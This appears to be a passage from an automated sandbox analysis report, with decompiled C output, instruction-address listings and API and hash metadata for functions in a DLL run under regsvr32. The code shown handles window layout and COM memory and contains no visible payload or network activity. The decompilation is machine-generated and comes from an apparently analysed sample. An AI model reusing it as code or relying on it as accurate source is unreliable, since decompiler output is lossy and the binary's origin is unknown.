										if(( *(_t200 + 5) & 0x00000001) != 0 &&  *_t200 != 0) {
											_t261 = _t261 + 1;
										}
										_t200 = _t200 + 0x14;
										_t247 = _t247 - 1;
									} while (_t247 != 0);
									_a12 = _t261;
									if(_t261 > 0) {
										_t273 = E1001F77E(_t261 + _t261 * 2 << 3);
										if(_t273 == 0) {
											_t64 =  &_v8;
											 *_t64 = _v8 & 0x00000000;
											__eflags =  *_t64;
										} else {
											E1002B8AD(_t273, 0x18, _a12, 0x1002be80);
											_v8 = _t273;
										}
										_a12 = _a12 & 0x00000000;
										_v12 = _v12 & 0x00000000;
										_t204 = _v24;
										_t275 = _v8 + 8;
										_v20 = _t275;
										_v24 = _t204;
										do {
											if(( *(_t204 + 5) & 0x00000001) != 0 &&  *_t204 != 0) {
												_t249 = _v12;
												 *((intOrPtr*)(_t275 - 8)) = _t249;
												 *((intOrPtr*)(_t275 - 4)) =  *_t204;
												 *((intOrPtr*)( *_t223 + 0x16c))(_t249,  &_v72);
												E10028E96(_t223,  &_v72);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t204 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t277 = _v32;
												_t275 = _v20;
											}
											_v12 = _v12 + 1;
											_t204 = _t204 + 0x14;
											_v24 = _t204;
										} while (_v12 < _t277);
									}
								}
								_t183 =  *(_t223 + 0x7c);
								if((_t183 & 0x00000001) != 0 && (_t183 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t223 + 0x6c)) = _v56;
								}
								_t271 = 0;
								_t307 = _t277;
								if(_t277 > 0) {
									_v20 = _v16;
									do {
										E1002B9F8(_t223, _t223, _t271, _t277, _t307, _t271, _v20);
										_v20 = _v20 + 0x14;
										_t271 = _t271 + 1;
									} while (_t271 < _t277);
								}
								_t184 = _a12;
								if(_t184 > 0) {
									_t282 = _v8 + 8;
									_a12 = _t184;
									do {
										_t186 = E10020230(_t223,  *((intOrPtr*)(_t282 - 4)));
										_v32 = _t186;
										if(_t186 != 0) {
											GetWindowRect( *(_t186 + 0x1c),  &_v72);
											_t271 = _v72.left -  *_t282;
											_v24 = _v72.top -  *((intOrPtr*)(_t282 + 4));
											 *((intOrPtr*)( *_t223 + 0x16c))( *((intOrPtr*)(_t282 - 8)),  &_v72);
											E100204FE(_v32, 0, _v72.left + _v72.left -  *_t282, _v24 + _v72.top, 0, 0, 0x15);
										}
										_t282 = _t282 + 0x18;
										_t125 =  &_a12;
										 *_t125 = _a12 - 1;
										_t313 =  *_t125;
									} while ( *_t125 != 0);
									_push(_v8);
									L1001F7A9(_t223, _t271, _t282, _t313);
								}
								_t270 = _v16;
								 *((intOrPtr*)(_t223 + 0x9c)) = _v48.bottom;
							}
							_push(_t270);
							L1001F7A9(_t223, _t270, _t277, _t313);
						}
					}
				}
				SetRectEmpty( &_v72);
				 *((intOrPtr*)( *_t223 + 0x13c))( &_v72, _a8 & 0x00000002);
				_v52 = _v52 + _v72.top - _v72.bottom;
				_v56 = _v56 + _v72.left - _v72.right;
				E1002F49A( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t170 = _v48.right;
				if(_v56 <= _t170) {
					_v56 = _t170;
				}
				_t171 = _v48.bottom;
				if(_v52 <= _t171) {
					_v52 = _t171;
				}
				_t172 = _a4;
				 *_t172 = _v56;
				 *(_t172 + 4) = _v52;
				return _t172;
			}










































                                                                                                            0x1002c1b0
                                                                                                            0x1002c1b2
                                                                                                            0x1002c1b3
                                                                                                            0x1002c1b7
                                                                                                            0x1002c1b8
                                                                                                            0x1002c1bd
                                                                                                            0x1002c1c0
                                                                                                            0x1002c1c3
                                                                                                            0x1002c1cc
                                                                                                            0x1002c1d2
                                                                                                            0x1002c1d5
                                                                                                            0x1002c1e2
                                                                                                            0x1002c1ea
                                                                                                            0x1002c1ed
                                                                                                            0x1002c1f3
                                                                                                            0x1002c1f6
                                                                                                            0x1002c1fc
                                                                                                            0x1002c201
                                                                                                            0x1002c205
                                                                                                            0x1002c206
                                                                                                            0x1002c20a
                                                                                                            0x1002c20d
                                                                                                            0x1002c211
                                                                                                            0x1002c217
                                                                                                            0x1002c21d
                                                                                                            0x1002c225
                                                                                                            0x1002c228
                                                                                                            0x1002c22b
                                                                                                            0x1002c299
                                                                                                            0x1002c299
                                                                                                            0x1002c2a1
                                                                                                            0x1002c2a3
                                                                                                            0x1002c2a3
                                                                                                            0x00000000
                                                                                                            0x1002c22d
                                                                                                            0x1002c231
                                                                                                            0x1002c293
                                                                                                            0x1002c293
                                                                                                            0x1002c294
                                                                                                            0x1002c233
                                                                                                            0x1002c237
                                                                                                            0x1002c241
                                                                                                            0x1002c245
                                                                                                            0x1002c24a
                                                                                                            0x1002c24e
                                                                                                            0x1002c28e
                                                                                                            0x1002c291
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002c250
                                                                                                            0x1002c254
                                                                                                            0x1002c269
                                                                                                            0x1002c272
                                                                                                            0x1002c272
                                                                                                            0x1002c275
                                                                                                            0x1002c282
                                                                                                            0x1002c282
                                                                                                            0x1002c277
                                                                                                            0x1002c27a
                                                                                                            0x1002c27a
                                                                                                            0x1002c285
                                                                                                            0x1002c28b
                                                                                                            0x1002c28b
                                                                                                            0x1002c247
                                                                                                            0x1002c247
                                                                                                            0x1002c2a8
                                                                                                            0x1002c2a8
                                                                                                            0x1002c2a8
                                                                                                            0x1002c239
                                                                                                            0x1002c239
                                                                                                            0x1002c23a
                                                                                                            0x1002c23a
                                                                                                            0x1002c237
                                                                                                            0x1002c231
                                                                                                            0x1002c2a9
                                                                                                            0x1002c2ac
                                                                                                            0x1002c2ad
                                                                                                            0x1002c2ad
                                                                                                            0x1002c2b2
                                                                                                            0x1002c2b3
                                                                                                            0x1002c2b7
                                                                                                            0x1002c2ba
                                                                                                            0x1002c2c8
                                                                                                            0x1002c2cb
                                                                                                            0x1002c2ce
                                                                                                            0x1002c2da
                                                                                                            0x1002c2de
                                                                                                            0x1002c2e1
                                                                                                            0x1002c2e4
                                                                                                            0x1002c2e7
                                                                                                            0x1002c2ed
                                                                                                            0x1002c2f3
                                                                                                            0x1002c2f6
                                                                                                            0x1002c2f9
                                                                                                            0x1002c2fb
                                                                                                            0x1002c2ff
                                                                                                            0x1002c306
                                                                                                            0x1002c306
                                                                                                            0x1002c307
                                                                                                            0x1002c30a
                                                                                                            0x1002c30a
                                                                                                            0x1002c30f
                                                                                                            0x1002c312
                                                                                                            0x1002c324
                                                                                                            0x1002c329
                                                                                                            0x1002c340
                                                                                                            0x1002c340
                                                                                                            0x1002c340
                                                                                                            0x1002c32b
                                                                                                            0x1002c336
                                                                                                            0x1002c33b
                                                                                                            0x1002c33b
                                                                                                            0x1002c347
                                                                                                            0x1002c34b
                                                                                                            0x1002c34f
                                                                                                            0x1002c352
                                                                                                            0x1002c355
                                                                                                            0x1002c358
                                                                                                            0x1002c35b
                                                                                                            0x1002c35f
                                                                                                            0x1002c366
                                                                                                            0x1002c369
                                                                                                            0x1002c372
                                                                                                            0x1002c37a
                                                                                                            0x1002c386
                                                                                                            0x1002c38b
                                                                                                            0x1002c38e
                                                                                                            0x1002c392
                                                                                                            0x1002c398
                                                                                                            0x1002c399
                                                                                                            0x1002c39a
                                                                                                            0x1002c39b
                                                                                                            0x1002c39c
                                                                                                            0x1002c39f
                                                                                                            0x1002c39f
                                                                                                            0x1002c3a2
                                                                                                            0x1002c3a5
                                                                                                            0x1002c3ab
                                                                                                            0x1002c3ab
                                                                                                            0x1002c35b
                                                                                                            0x1002c312
                                                                                                            0x1002c3b0
                                                                                                            0x1002c3b5
                                                                                                            0x1002c3be
                                                                                                            0x1002c3be
                                                                                                            0x1002c3c1
                                                                                                            0x1002c3c3
                                                                                                            0x1002c3c5
                                                                                                            0x1002c3ca
                                                                                                            0x1002c3cd
                                                                                                            0x1002c3d3
                                                                                                            0x1002c3d8
                                                                                                            0x1002c3dc
                                                                                                            0x1002c3dd
                                                                                                            0x1002c3cd
                                                                                                            0x1002c3e1
                                                                                                            0x1002c3e6
                                                                                                            0x1002c3eb
                                                                                                            0x1002c3ee
                                                                                                            0x1002c3f1
                                                                                                            0x1002c3f6
                                                                                                            0x1002c3fd
                                                                                                            0x1002c400
                                                                                                            0x1002c409
                                                                                                            0x1002c417
                                                                                                            0x1002c425
                                                                                                            0x1002c42c
                                                                                                            0x1002c44b
                                                                                                            0x1002c44b
                                                                                                            0x1002c450
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c458
                                                                                                            0x1002c45b
                                                                                                            0x1002c460
                                                                                                            0x1002c464
                                                                                                            0x1002c467
                                                                                                            0x1002c467
                                                                                                            0x1002c46d
                                                                                                            0x1002c46e
                                                                                                            0x1002c473
                                                                                                            0x1002c211
                                                                                                            0x1002c1ed
                                                                                                            0x1002c478
                                                                                                            0x1002c48d
                                                                                                            0x1002c49a
                                                                                                            0x1002c4a5
                                                                                                            0x1002c4b3
                                                                                                            0x1002c4b8
                                                                                                            0x1002c4c1
                                                                                                            0x1002c4c3
                                                                                                            0x1002c4c3
                                                                                                            0x1002c4c6
                                                                                                            0x1002c4cc
                                                                                                            0x1002c4ce
                                                                                                            0x1002c4ce
                                                                                                            0x1002c4d1
                                                                                                            0x1002c4d7
                                                                                                            0x1002c4dc
                                                                                                            0x1002c4e0

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Empty$Window
                                                                                                            • String ID: @
                                                                                                            • API String ID: 444217639-2766056989
                                                                                                            • Opcode ID: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                                                            • Instruction ID: 58262607db454327f65a07b4950f04bdf16dc99993eabd06514925c449a16dc0
                                                                                                            • Opcode Fuzzy Hash: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                                                            • Instruction Fuzzy Hash: 11C13972D00209DFCB05CFA8D994EAEB7F5FF48350F518569E815AB251DB34AE05CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000E14F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E1000E14F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _t130;
				intOrPtr* _t133;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr _t144;
				signed int _t146;
				intOrPtr* _t147;
				void* _t149;
				intOrPtr* _t153;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr _t174;
				signed int _t178;
				signed int _t180;
				signed int _t186;
				signed int _t188;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr* _t199;
				void* _t200;
				intOrPtr _t213;
				intOrPtr* _t215;
				intOrPtr* _t261;
				void* _t263;

				E10011BF0(0x1003af36, _t263);
				_t130 =  *0x1004c470; // 0xf3933a06
				_t261 = __ecx;
				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t133 =  *((intOrPtr*)(__ecx + 8));
					if(_t133 != 0) {
						_push(_t263 - 0x7c);
						_push(_t263 - 0x78);
						_push(0x10043008);
						_push(_t133);
						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
							E1000B1A4(_t263 - 0x70, 0x10043744);
							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x58)) = 0;
							 *((intOrPtr*)(_t263 - 0x54)) = 0;
							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
							 *((intOrPtr*)(_t263 - 0x48)) = 0;
							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
							E1000B1A4(_t263 - 0x40, 0x1004372c);
							_t140 =  *((intOrPtr*)(_t263 - 0x78));
							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
							 *((intOrPtr*)(_t263 - 0x24)) = 0;
							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
							 *((intOrPtr*)(_t263 - 0x18)) = 0;
							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
							if(_t196 >= 0) {
								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
								_t143 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
								 *(_t263 - 0x98) = 0;
								 *((intOrPtr*)(_t263 - 0x94)) = 0;
								 *((intOrPtr*)(_t263 - 0x90)) = 0;
								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
								if(_t144 >= 0) {
									 *(_t261 + 0x14) =  *(_t263 - 0x98);
									_t146 =  *(_t263 - 0x8c);
									 *(_t263 - 0x7c) = _t146;
									 *(_t261 + 0x10) = _t146;
									_t147 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
									 *((intOrPtr*)( *_t147 + 8))(_t147);
									goto L23;
								} else {
									_t161 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)( *_t161 + 8))(_t161);
								}
								goto L41;
							} else {
								_t163 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t163 + 8))(_t163);
								_t134 = _t196;
							}
						}
					} else {
						_t134 = 0;
					}
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x10043228, _t263 - 0x74);
					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
					if(_t134 >= 0) {
						_t166 =  *((intOrPtr*)(_t263 - 0x74));
						_push(_t263 - 0x7c);
						_push(0x10043208);
						_push(_t166);
						if( *((intOrPtr*)( *_t166))() >= 0) {
							_t186 =  *(_t263 - 0x7c);
							_push(_t263 - 0x78);
							_push(0x10043348);
							 *((intOrPtr*)(_t263 - 0x78)) = 0;
							_push(_t186);
							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
								_t190 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
								_t192 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t192 + 8))(_t192);
							}
							_t188 =  *(_t263 - 0x7c);
							 *((intOrPtr*)( *_t188 + 8))(_t188);
						}
						if(E1001F77E(0x14) == 0) {
							_t169 = 0;
						} else {
							_t169 = E1000D069(_t168,  *((intOrPtr*)(_t263 - 0x74)));
						}
						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
						_t170 =  *((intOrPtr*)(_t263 - 0x74));
						 *((intOrPtr*)( *_t170 + 8))(_t170);
						_t172 =  *((intOrPtr*)(_t261 + 0x50));
						_t229 =  *_t172;
						if( *_t172 != 0) {
							E1000B427(_t229, _t172 + 4);
						}
						if(E1001F77E(0x28) == 0) {
							_t174 = 0;
						} else {
							_t174 = E10009E9C(_t173, 0, 0x1f40);
						}
						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
						E1000DB7F(_t174);
						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
						 *(_t261 + 0x10) = _t178;
						_t180 = _t178 + _t178 * 4 << 3;
						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
						 *(_t261 + 0x14) = _t180;
						E10011C50(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
						E1000DA69( *((intOrPtr*)(_t261 + 0x50)));
						E1000B3E4( *((intOrPtr*)(_t261 + 0x50)));
						L23:
						 *((intOrPtr*)(_t263 - 0x74)) = 0;
						if( *(_t261 + 0x10) > 0) {
							_t200 = 0;
							do {
								_t158 = E1001F77E(0x1c);
								 *(_t263 - 0x7c) = _t158;
								 *(_t263 - 4) = 0;
								if(_t158 == 0) {
									_t159 = 0;
								} else {
									_t159 = E1001E0EA(_t158, 0xa);
								}
								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
								_t200 = _t200 + 0x28;
							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
						}
						_t198 =  *((intOrPtr*)(_t263 - 0x88));
						if(_t198 != 0) {
							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
								_t149 = 0xffffffdc;
								_t199 = _t198 + 0x24;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
								while(1) {
									_t213 =  *((intOrPtr*)( *_t199 + 4));
									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
									if(_t213 == 0) {
										goto L37;
									}
									while(1) {
										_t153 = E10006D96(_t263 - 0x80);
										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
											goto L37;
										}
									}
									L37:
									E1001E047( *_t199);
									_t215 =  *_t199;
									if(_t215 != 0) {
										 *((intOrPtr*)( *_t215 + 4))(1);
									}
									_t199 = _t199 + 0x28;
									_t122 = _t263 - 0x74;
									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
									if( *_t122 != 0) {
										continue;
									}
									goto L40;
								}
							}
							L40:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
						}
						L41:
						_t134 =  *((intOrPtr*)(_t263 - 0x84));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
				return E100117AE(_t134,  *((intOrPtr*)(_t263 - 0x10)));
			}




































                                                                                                            0x1000e154
                                                                                                            0x1000e15f
                                                                                                            0x1000e166
                                                                                                            0x1000e168
                                                                                                            0x1000e16f
                                                                                                            0x1000e17d
                                                                                                            0x1000e180
                                                                                                            0x1000e2ad
                                                                                                            0x1000e2b2
                                                                                                            0x1000e2c0
                                                                                                            0x1000e2c4
                                                                                                            0x1000e2c5
                                                                                                            0x1000e2ca
                                                                                                            0x1000e2d0
                                                                                                            0x1000e2e1
                                                                                                            0x1000e2e6
                                                                                                            0x1000e2f5
                                                                                                            0x1000e2f8
                                                                                                            0x1000e2fb
                                                                                                            0x1000e302
                                                                                                            0x1000e305
                                                                                                            0x1000e30c
                                                                                                            0x1000e311
                                                                                                            0x1000e314
                                                                                                            0x1000e321
                                                                                                            0x1000e328
                                                                                                            0x1000e32b
                                                                                                            0x1000e332
                                                                                                            0x1000e335
                                                                                                            0x1000e342
                                                                                                            0x1000e346
                                                                                                            0x1000e365
                                                                                                            0x1000e36b
                                                                                                            0x1000e371
                                                                                                            0x1000e37b
                                                                                                            0x1000e381
                                                                                                            0x1000e387
                                                                                                            0x1000e390
                                                                                                            0x1000e395
                                                                                                            0x1000e39b
                                                                                                            0x1000e3b7
                                                                                                            0x1000e3ba
                                                                                                            0x1000e3c0
                                                                                                            0x1000e3c3
                                                                                                            0x1000e3c6
                                                                                                            0x1000e3c9
                                                                                                            0x1000e3cf
                                                                                                            0x00000000
                                                                                                            0x1000e39d
                                                                                                            0x1000e39d
                                                                                                            0x1000e3a3
                                                                                                            0x1000e3a3
                                                                                                            0x00000000
                                                                                                            0x1000e348
                                                                                                            0x1000e348
                                                                                                            0x1000e34e
                                                                                                            0x1000e351
                                                                                                            0x1000e351
                                                                                                            0x1000e346
                                                                                                            0x1000e2b4
                                                                                                            0x1000e2b4
                                                                                                            0x1000e2b4
                                                                                                            0x1000e186
                                                                                                            0x1000e186
                                                                                                            0x1000e195
                                                                                                            0x1000e19a
                                                                                                            0x1000e1a0
                                                                                                            0x1000e1a6
                                                                                                            0x1000e1ae
                                                                                                            0x1000e1af
                                                                                                            0x1000e1b4
                                                                                                            0x1000e1b9
                                                                                                            0x1000e1bb
                                                                                                            0x1000e1c1
                                                                                                            0x1000e1c2
                                                                                                            0x1000e1c7
                                                                                                            0x1000e1cc
                                                                                                            0x1000e1d2
                                                                                                            0x1000e1d4
                                                                                                            0x1000e1e8
                                                                                                            0x1000e1eb
                                                                                                            0x1000e1f1
                                                                                                            0x1000e1f1
                                                                                                            0x1000e1f4
                                                                                                            0x1000e1fa
                                                                                                            0x1000e1fa
                                                                                                            0x1000e207
                                                                                                            0x1000e215
                                                                                                            0x1000e209
                                                                                                            0x1000e20e
                                                                                                            0x1000e20e
                                                                                                            0x1000e217
                                                                                                            0x1000e21a
                                                                                                            0x1000e220
                                                                                                            0x1000e223
                                                                                                            0x1000e226
                                                                                                            0x1000e22a
                                                                                                            0x1000e231
                                                                                                            0x1000e231
                                                                                                            0x1000e240
                                                                                                            0x1000e251
                                                                                                            0x1000e242
                                                                                                            0x1000e24a
                                                                                                            0x1000e24a
                                                                                                            0x1000e256
                                                                                                            0x1000e25d
                                                                                                            0x1000e268
                                                                                                            0x1000e26e
                                                                                                            0x1000e271
                                                                                                            0x1000e277
                                                                                                            0x1000e27b
                                                                                                            0x1000e28d
                                                                                                            0x1000e290
                                                                                                            0x1000e29b
                                                                                                            0x1000e2a3
                                                                                                            0x1000e3d2
                                                                                                            0x1000e3d5
                                                                                                            0x1000e3d8
                                                                                                            0x1000e3da
                                                                                                            0x1000e3dc
                                                                                                            0x1000e3de
                                                                                                            0x1000e3e4
                                                                                                            0x1000e3e9
                                                                                                            0x1000e3ec
                                                                                                            0x1000e3f9
                                                                                                            0x1000e3ee
                                                                                                            0x1000e3f2
                                                                                                            0x1000e3f2
                                                                                                            0x1000e3fb
                                                                                                            0x1000e402
                                                                                                            0x1000e405
                                                                                                            0x1000e40c
                                                                                                            0x1000e40f
                                                                                                            0x1000e3dc
                                                                                                            0x1000e414
                                                                                                            0x1000e41c
                                                                                                            0x1000e421
                                                                                                            0x1000e428
                                                                                                            0x1000e429
                                                                                                            0x1000e432
                                                                                                            0x1000e435
                                                                                                            0x1000e43d
                                                                                                            0x1000e43f
                                                                                                            0x1000e444
                                                                                                            0x1000e447
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000e44e
                                                                                                            0x1000e45b
                                                                                                            0x1000e469
                                                                                                            0x1000e46f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000e44b
                                                                                                            0x1000e471
                                                                                                            0x1000e473
                                                                                                            0x1000e478
                                                                                                            0x1000e47c
                                                                                                            0x1000e482
                                                                                                            0x1000e482
                                                                                                            0x1000e485
                                                                                                            0x1000e488
                                                                                                            0x1000e488
                                                                                                            0x1000e48b
                                                                                                            0x00000000
                                                                                                            0x1000e43a
                                                                                                            0x00000000
                                                                                                            0x1000e48b
                                                                                                            0x1000e43d
                                                                                                            0x1000e48d
                                                                                                            0x1000e493
                                                                                                            0x1000e493
                                                                                                            0x1000e499
                                                                                                            0x1000e499
                                                                                                            0x1000e499
                                                                                                            0x1000e1a0
                                                                                                            0x1000e4a4
                                                                                                            0x1000e4b5

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000E154
                                                                                                            • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E27B
                                                                                                            • CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E493
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Task$AllocFreeH_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 1522537378-3916222277
                                                                                                            • Opcode ID: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                                                            • Instruction ID: e4bcf968e0ea1d6695bf60cb4aa7b1ca6ea302c548195cc232f4004078e55fdd
                                                                                                            • Opcode Fuzzy Hash: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                                                            • Instruction Fuzzy Hash: AAC11874A006489FDB24CFA8C884AAEBBF5FF88344F20465DE155EB256DB71AD45CF10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000B6F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1000B6F5(void* __ecx) {
				intOrPtr* _t76;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t143;
				void* _t146;
				void* _t148;

				E10011BF0(0x1003ae9f, _t148);
				_t146 = __ecx;
				_t76 =  *((intOrPtr*)(__ecx + 0x4c));
				_push(_t148 - 0x14);
				_push(0x10043128);
				 *((intOrPtr*)(_t148 - 0x14)) = 0;
				_push(_t76);
				 *((intOrPtr*)(_t148 - 0x18)) = 0;
				if( *((intOrPtr*)( *_t76))() >= 0) {
					 *((intOrPtr*)(_t148 - 0x7c)) = __ecx + 0xc4;
					 *((intOrPtr*)(_t148 - 0x74)) = __ecx + 0xd4;
					 *((intOrPtr*)(_t148 - 0x70)) = __ecx + 0xd8;
					 *((intOrPtr*)(_t148 - 0x80)) = 0x40;
					 *((intOrPtr*)(_t148 - 0x78)) = 0;
					 *((intOrPtr*)(_t148 - 0x5c)) = 0;
					 *((intOrPtr*)(_t148 - 0x50)) = 0;
					 *((intOrPtr*)(_t148 - 0x4c)) = 0;
					E10010592(_t148 - 0x28);
					_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
					 *((intOrPtr*)(_t148 - 4)) = 0;
					 *(_t148 - 0x6c) = 0;
					 *((intOrPtr*)(_t148 - 0x10)) = 0;
					do {
						 *((intOrPtr*)( *_t143 + 0x104))(_t146,  *((intOrPtr*)( *((intOrPtr*)(_t148 - 0x10)) + 0x10040560)), _t148 - 0x28);
						if( *((intOrPtr*)(_t148 - 0x20)) != 0) {
							 *(_t148 - 0x6c) =  *(_t148 - 0x6c) |  *( *((intOrPtr*)(_t148 - 0x10)) + 0x10040564);
						}
						 *((intOrPtr*)(_t148 - 0x10)) =  *((intOrPtr*)(_t148 - 0x10)) + 8;
					} while ( *((intOrPtr*)(_t148 - 0x10)) < 0x40);
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd40, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x68)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd43, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x64)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd34, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x58)) =  *((short*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd3f, _t148 - 0x28);
